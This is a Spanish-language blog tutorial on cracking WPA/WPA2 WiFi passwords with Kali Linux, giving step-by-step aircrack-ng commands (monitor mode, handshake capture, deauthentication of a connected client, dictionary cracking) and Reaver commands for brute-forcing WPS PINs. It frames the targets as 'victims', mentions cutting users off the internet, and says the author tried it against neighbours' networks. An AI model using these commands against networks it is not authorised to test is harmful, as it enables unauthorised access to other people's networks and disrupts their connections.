Dos métodos para Hackear WIFI WPA/WPA2 desde Kali Linux 2.0

Hace un buen tiempo pregunte por facebook sobre que querían que escribiera. Entonces he decidido hacer más de redes y he estado jugando con algunas herramientas donde puedes conseguir la contraseña de su victima. Puedes encontrar más info aqui
TENEMOS LA HERRAMIENTA QUE HACE FUERZA BRUTA. “Aircrack”
Creo que aparte de hacer fuerza bruta puedes hacer que el usuario no se conecte en el internet.

Primero concepto.
¿Qué es Aircrack?

 Aircrack-ng es una suite de software de seguridad inalámbrica. Consiste en un analizador de paquetes de redes, un crackeador de redes WEP y WPA/WPA2-PSK y otro conjunto de herramientas de auditoría inalámbrica.
Entre las herramientas que se incluyen en esta suite se encuentran las siguientes:
  • airbase-ng
  • aircrack-ng
  • airdecap-ng
  • airdecloak-ng
  • airdriver-ng
  • aireplay-ng
  • airmon-ng
  • airodump-ng
  • airolib-ng
  • airserv-ng
  • airtun-ng
  • easside-ng
  • packetforge-ng
  • tkiptun-ng
  • wesside-ng
  • airdecloak-ng

Las herramientas más utilizadas para la auditoría inalámbrica son:

  • Aircrack-ng (descifra la clave de los vectores de inicio)
  • Airodump-ng (escanea las redes y captura vectores de inicio)
  • Aireplay-ng (inyecta tráfico para elevar la captura de vectores de inicio)
  • Airmon-ng (establece la tarjeta inalámbrica en modo monitor, para poder capturar e inyectar vectores)

Screenshot from 2015-12-29 03:40:02

 

Ahora vamos a usar un poco de practica.

 iwconfig

Screenshot from 2015-12-29 03:37:03
Lo que observamos es iwconfig que se utiliza para visualizar y modificar los parámetros de la interfaz de red que son específicos para el funcionamiento inalámbrico (por ejemplo, la interfaz de nombre, frecuencia, SSID). También puede ser usado para mostrar las estadísticas inalámbricas (Extraido desde /proc/net/wireless).

airmon-ng check kill wlan0

Este comando detiene los administradores de red y luego matan a los procesos que dejan interferir.

 airmon-ng start wlan0

Activar el modo de monitor

Nota: Es muy importante para matar a los gestores de la red antes de poner una tarjeta en modo monitor!
En mi caso me muestra info de mi tarjeta de red y nos nuestra wlan0mon

 airodump-ng wlan0mon

Comenzará scanear para obtener BSSID o algunos ratos de la red.

 airodump-ng -c (channel) --bssid (BSSID) -w /root/ wlan0mon

-c Colocamos para el canal que nos mostro en el anterior comando.
–bssid Es el paquete de la red inalambrica.
-w Ubicacion donde quieres que guarde la data.
wlan0mon es nuestra interfaz de red que usamos para el proceso.

aireplay-ng -0 0 -a (BSSID) -c (Station) wlan0mon

Para todos los ataques, excepto el de deautenticación y el de falsa autenticación, puedes usar los siguientes filtros para limitar los paquetes que se usarán. El filtro más común es usar la opción “-b” para seleccionar un punto de acceso determinado.

Opciones de filtro:

-b bssid : Dirección MAC del punto de acceso
-d dmac : Dirección MAC de destino
-s smac : Dirección MAC origen (source)
-m len : Longitud mínima del paquete
-n len : Longitud máxima del paquete
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit

Opciones de inyeción:

-x nbpps : número de paquetes por segundo
-p fctrl : fijar palabra “frame control” (hexadecimal)
-a bssid : fijar dirección MAC del AP
-c dmac : fijar dirección MAC de destino
-h smac : fijar dirección MAC origen
-e essid : ataque de falsa autenticación: nombre del AP
-j : ataque arp-replay: inyectar paquetes FromDS
-g valor : cambiar tamaño de buffer (default: 8)
-k IP : fijar IP de destino en fragmentos
-l IP : fijar IP de origen en fragmentos
-o npckts : número de paquetes por burst (-1)
-q sec : segundos entre paquetes “sigo aquí” o keep-alives (-1)
-y prga : keystream para autenticación compartida (shared key)

 aircrack-ng -a2 -b (BSSID) -w (diccionario) (UBICACION .cap)

Listo comienza a scanear todo el diccionario para obtener la contraseña.

SEGUNDO METODO

Este método lo siento pero lo mega siento porque la herramienta muestre errores en el proceso en el video.
Porque no es compatibles con la RED de mis vecinos ni con la miá.

¿Qué es Reaver?
Reaver realiza un ataque de fuerza bruta contra WiFi Protected número de pin Configuración de un punto de acceso. Una vez encontrado el PIN WPS, WPA PSK puede ser recuperado y alternativamente la configuración inalámbrica de la AP se puede configurar. Mientras Reaver no soporta la reconfiguración de la AP, esto se puede lograr con wpa_supplicant vez que se conoce el pasador WPS.
 wash -i wlan0mon

Escaneará todas las redes cerca y obtendrán BSSID, Channel.

reaver -i wlan0mon -b  (BSSID) -vv -k 1
reaver -i wlan0mon -b  (BSSID) -c (channel) -N -S -vv -k 1

Bueno existe muchas herramientas en Kali Linux 2.0 para hacer un mega ataque en la red.
Espero haberte ayudado y no te olvides de ayudarme en compartirlo. Gracias. CREADPAG